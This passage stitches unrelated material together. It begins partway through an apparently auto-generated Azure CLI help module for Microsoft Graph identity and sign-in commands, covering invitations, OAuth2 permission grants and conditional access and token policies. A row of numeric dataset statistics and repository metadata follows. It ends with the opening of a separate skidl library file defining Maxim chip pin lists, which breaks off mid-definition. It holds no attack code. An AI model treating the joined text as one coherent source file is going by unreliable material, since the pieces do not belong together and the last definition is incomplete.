short-summary: "Update the navigation property threatAssessmentRequests in informationProtection."
parameters:
- name: --results
short-summary: "A collection of threat assessment results. Read-only. By default, a GET \
/threatAssessmentRequests/{id} does not return this property unless you apply $expand on it."
long-summary: |
Usage: --results created-date-time=XX message=XX result-type=XX id=XX
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'.
message: The result message for each threat assessment.
id: Read-only.
Multiple actions can be specified by using more than one --results argument.
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['identitysignins informationprotectionthreatassessmentrequest'] = """
type: group
short-summary: Manage informationprotectionthreatassessmentrequest with identitysignins
"""
helps['identitysignins informationprotectionthreatassessmentrequest create-result'] = """
type: command
short-summary: "Create new navigation property to results for informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest delete-result'] = """
type: command
short-summary: "Delete navigation property results for informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest list-result'] = """
type: command
short-summary: "Get results from informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest show-result'] = """
type: command
short-summary: "Get results from informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest update-result'] = """
type: command
short-summary: "Update the navigation property results in informationProtection."
"""
helps['identitysignins invitationsinvitation'] = """
type: group
short-summary: Manage invitationsinvitation with identitysignins
"""
helps['identitysignins invitationsinvitation create-invitation'] = """
type: command
short-summary: "Add new entity to invitations."
"""
helps['identitysignins invitationsinvitation delete-invitation'] = """
type: command
short-summary: "Delete entity from invitations."
"""
helps['identitysignins invitationsinvitation list-invitation'] = """
type: command
short-summary: "Get entities from invitations."
"""
helps['identitysignins invitationsinvitation show-invitation'] = """
type: command
short-summary: "Get entity from invitations by key."
"""
helps['identitysignins invitationsinvitation update-invitation'] = """
type: command
short-summary: "Update entity in invitations."
"""
helps['identitysignins invitation'] = """
type: group
short-summary: Manage invitation with identitysignins
"""
helps['identitysignins invitation delete-ref-invited-user'] = """
type: command
short-summary: "Delete ref of navigation property invitedUser for invitations."
"""
helps['identitysignins invitation set-ref-invited-user'] = """
type: command
short-summary: "Update the ref of navigation property invitedUser in invitations."
"""
helps['identitysignins invitation show-invited-user'] = """
type: command
short-summary: "Get invitedUser from invitations."
"""
helps['identitysignins invitation show-ref-invited-user'] = """
type: command
short-summary: "Get ref of invitedUser from invitations."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant'] = """
type: group
short-summary: Manage oauth2permissiongrantsoauth2permissiongrant with identitysignins
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant create-o-auth2-permission-grant'] = """
type: command
short-summary: "Add new entity to oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant delete-o-auth2-permission-grant'] = """
type: command
short-summary: "Delete entity from oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant list-o-auth2-permission-grant'] = """
type: command
short-summary: "Get entities from oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant show-o-auth2-permission-grant'] = """
type: command
short-summary: "Get entity from oauth2PermissionGrants by key."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant update-o-auth2-permission-grant'] = """
type: command
short-summary: "Update entity in oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrant'] = """
type: group
short-summary: Manage oauth2permissiongrant with identitysignins
"""
helps['identitysignins oauth2permissiongrant delta'] = """
type: command
short-summary: "Invoke function delta."
"""
helps['identitysignins organization'] = """
type: group
short-summary: Manage organization with identitysignins
"""
helps['identitysignins organization create-ref-certificate-based-auth-configuration'] = """
type: command
short-summary: "Create new navigation property ref to certificateBasedAuthConfiguration for organization."
"""
helps['identitysignins organization list-certificate-based-auth-configuration'] = """
type: command
short-summary: "Get certificateBasedAuthConfiguration from organization."
"""
helps['identitysignins organization list-ref-certificate-based-auth-configuration'] = """
type: command
short-summary: "Get ref of certificateBasedAuthConfiguration from organization."
"""
helps['identitysignins policiespolicyroot'] = """
type: group
short-summary: Manage policiespolicyroot with identitysignins
"""
helps['identitysignins policiespolicyroot show-policy-root'] = """
type: command
short-summary: "Get policies."
"""
helps['identitysignins policiespolicyroot update-policy-root'] = """
type: command
short-summary: "Update policies."
parameters:
- name: --activity-based-timeout-policies
long-summary: |
Usage: --activity-based-timeout-policies definition=XX is-organization-default=XX applies-to=XX \
description=XX display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --activity-based-timeout-policies argument.
- name: --claims-mapping-policies
long-summary: |
Usage: --claims-mapping-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --claims-mapping-policies argument.
- name: --home-realm-discovery-policies
long-summary: |
Usage: --home-realm-discovery-policies definition=XX is-organization-default=XX applies-to=XX \
description=XX display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --home-realm-discovery-policies argument.
- name: --token-issuance-policies
long-summary: |
Usage: --token-issuance-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --token-issuance-policies argument.
- name: --token-lifetime-policies
long-summary: |
Usage: --token-lifetime-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --token-lifetime-policies argument.
- name: --identity-security-defaults-enforcement-policy
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --identity-security-defaults-enforcement-policy is-enabled=XX description=XX display-name=XX \
deleted-date-time=XX id=XX
is-enabled: If set to true, Azure Active Directory security defaults is enabled for the tenant.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
"""
helps['identitysignins policy'] = """
type: group
short-summary: Manage policy with identitysignins
"""
helps['identitysignins policy create-activity-based-timeout-policy'] = """
type: command
short-summary: "Create new navigation property to activityBasedTimeoutPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-claim-mapping-policy'] = """
type: command
short-summary: "Create new navigation property to claimsMappingPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-conditional-access-policy'] = """
type: command
short-summary: "Create new navigation property to conditionalAccessPolicies for policies."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins policy create-home-realm-discovery-policy'] = """
type: command
short-summary: "Create new navigation property to homeRealmDiscoveryPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-permission-grant-policy'] = """
type: command
short-summary: "Create new navigation property to permissionGrantPolicies for policies."
parameters:
- name: --excludes
long-summary: |
Usage: --excludes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --excludes argument.
- name: --includes
long-summary: |
Usage: --includes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --includes argument.
"""
helps['identitysignins policy create-token-issuance-policy'] = """
type: command
short-summary: "Create new navigation property to tokenIssuancePolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-token-lifetime-policy'] = """
type: command
short-summary: "Create new navigation property to tokenLifetimePolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy delete-activity-based-timeout-policy'] = """
type: command
short-summary: "Delete navigation property activityBasedTimeoutPolicies for policies."
"""
helps['identitysignins policy delete-claim-mapping-policy'] = """
type: command
short-summary: "Delete navigation property claimsMappingPolicies for policies."
"""
helps['identitysignins policy delete-conditional-access-policy'] = """
type: command
short-summary: "Delete navigation property conditionalAccessPolicies for policies."
"""
helps['identitysignins policy delete-home-realm-discovery-policy'] = """
type: command
short-summary: "Delete navigation property homeRealmDiscoveryPolicies for policies."
"""
helps['identitysignins policy delete-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies."
"""
helps['identitysignins policy delete-permission-grant-policy'] = """
type: command
short-summary: "Delete navigation property permissionGrantPolicies for policies."
"""
helps['identitysignins policy delete-token-issuance-policy'] = """
type: command
short-summary: "Delete navigation property tokenIssuancePolicies for policies."
"""
helps['identitysignins policy delete-token-lifetime-policy'] = """
type: command
short-summary: "Delete navigation property tokenLifetimePolicies for policies."
"""
helps['identitysignins policy list-activity-based-timeout-policy'] = """
type: command
short-summary: "Get activityBasedTimeoutPolicies from policies."
"""
helps['identitysignins policy list-claim-mapping-policy'] = """
type: command
short-summary: "Get claimsMappingPolicies from policies."
"""
helps['identitysignins policy list-conditional-access-policy'] = """
type: command
short-summary: "Get conditionalAccessPolicies from policies."
"""
helps['identitysignins policy list-home-realm-discovery-policy'] = """
type: command
short-summary: "Get homeRealmDiscoveryPolicies from policies."
"""
helps['identitysignins policy list-permission-grant-policy'] = """
type: command
short-summary: "Get permissionGrantPolicies from policies."
"""
helps['identitysignins policy list-token-issuance-policy'] = """
type: command
short-summary: "Get tokenIssuancePolicies from policies."
"""
helps['identitysignins policy list-token-lifetime-policy'] = """
type: command
short-summary: "Get tokenLifetimePolicies from policies."
"""
helps['identitysignins policy show-activity-based-timeout-policy'] = """
type: command
short-summary: "Get activityBasedTimeoutPolicies from policies."
"""
helps['identitysignins policy show-claim-mapping-policy'] = """
type: command
short-summary: "Get claimsMappingPolicies from policies."
"""
helps['identitysignins policy show-conditional-access-policy'] = """
type: command
short-summary: "Get conditionalAccessPolicies from policies."
"""
helps['identitysignins policy show-home-realm-discovery-policy'] = """
type: command
short-summary: "Get homeRealmDiscoveryPolicies from policies."
"""
helps['identitysignins policy show-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Get identitySecurityDefaultsEnforcementPolicy from policies."
"""
helps['identitysignins policy show-permission-grant-policy'] = """
type: command
short-summary: "Get permissionGrantPolicies from policies."
"""
helps['identitysignins policy show-token-issuance-policy'] = """
type: command
short-summary: "Get tokenIssuancePolicies from policies."
"""
helps['identitysignins policy show-token-lifetime-policy'] = """
type: command
short-summary: "Get tokenLifetimePolicies from policies."
"""
helps['identitysignins policy update-activity-based-timeout-policy'] = """
type: command
short-summary: "Update the navigation property activityBasedTimeoutPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-claim-mapping-policy'] = """
type: command
short-summary: "Update the navigation property claimsMappingPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-conditional-access-policy'] = """
type: command
short-summary: "Update the navigation property conditionalAccessPolicies in policies."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins policy update-home-realm-discovery-policy'] = """
type: command
short-summary: "Update the navigation property homeRealmDiscoveryPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies."
"""
helps['identitysignins policy update-permission-grant-policy'] = """
type: command
short-summary: "Update the navigation property permissionGrantPolicies in policies."
parameters:
- name: --excludes
long-summary: |
Usage: --excludes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --excludes argument.
- name: --includes
long-summary: |
Usage: --includes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --includes argument.
"""
helps['identitysignins policy update-token-issuance-policy'] = """
type: command
short-summary: "Update the navigation property tokenIssuancePolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-token-lifetime-policy'] = """
type: command
short-summary: "Update the navigation property tokenLifetimePolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policiespermissiongrantpolicy'] = """
type: group
short-summary: Manage policiespermissiongrantpolicy with identitysignins
"""
helps['identitysignins policiespermissiongrantpolicy create-exclude'] = """
type: command
short-summary: "Create new navigation property to excludes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy create-include'] = """
type: command
short-summary: "Create new navigation property to includes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy delete-exclude'] = """
type: command
short-summary: "Delete navigation property excludes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy delete-include'] = """
type: command
short-summary: "Delete navigation property includes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy list-exclude'] = """
type: command
short-summary: "Get excludes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy list-include'] = """
type: command
short-summary: "Get includes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy show-exclude'] = """
type: command
short-summary: "Get excludes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy show-include'] = """
type: command
short-summary: "Get includes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy update-exclude'] = """
type: command
short-summary: "Update the navigation property excludes in policies."
"""
helps['identitysignins policiespermissiongrantpolicy update-include'] = """
type: command
short-summary: "Update the navigation property includes in policies."
"""
| 43.8 | 121 | 0.691895 | 5,705 | 52,560 | 6.374233 | 0.059422 | 0.054118 | 0.045318 | 0.065145 | 0.86685 | 0.812155 | 0.773738 | 0.736257 | 0.702269 | 0.669325 | 0 | 0.002894 | 0.217618 | 52,560 | 1,199 | 122 | 43.83653 | 0.881426 | 0.008942 | 0 | 0.756371 | 0 | 0.079511 | 0.9523 | 0.203754 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.001019 | 0 | 0.001019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
56c014faadf327e9e07439242b558cded6ec62d7 | 14,098 | py | Python | skidl/libs/maxim_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/maxim_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/maxim_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
maxim = SchLib(tool=SKIDL).add_parts(*[
Part(name='DS1267_DIP',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, DIP-14',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='~Reset',do_erc=True),
Pin(num='6',name='CLK',do_erc=True),
Pin(num='7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='DQ',do_erc=True),
Pin(num='9',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1267_SOIC',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, SOIC-16',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x9.9mm*1.27mm'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='~Reset',do_erc=True),
Pin(num='7',name='CLK',do_erc=True),
Pin(num='8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='DQ',do_erc=True),
Pin(num='10',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='11',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='16',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1267_TSSOP',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, TSSOP-20',ref_prefix='U',num_units=1,fplist=['TSSOP*4.4x6.5mm*0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='~Reset',do_erc=True),
Pin(num='7',name='CLK',do_erc=True),
Pin(num='8',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='9',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='DQ',do_erc=True),
Pin(num='12',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='13',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='18',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='19',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='DS1302',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1307+',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['DS1307N+', 'DS1307Z+']),
Part(name='DS1602',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1621',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1804',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1822Z',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1Wire Dallas Maxim',description='High-Precision 1-Wire Digital Thermometer SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC-8_3.9x4.9mm_Pitch1.27mm', 'SOIC-8_3.9x4.9mm_Pitch1.27mm*'],do_erc=True,aliases=['DS18B20Z', 'DS18S20Z'],pins=[
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1825',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='Programmable Resolution 1-Wire Digital Thermometer With 4-Bit ID',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='AD0',do_erc=True),
Pin(num='6',name='AD1',do_erc=True),
Pin(num='7',name='AD2',do_erc=True),
Pin(num='8',name='AD3',do_erc=True)]),
Part(name='DS18B20U',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='Programmable Resolution 1-Wire Digital Thermometer MSOP-8',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
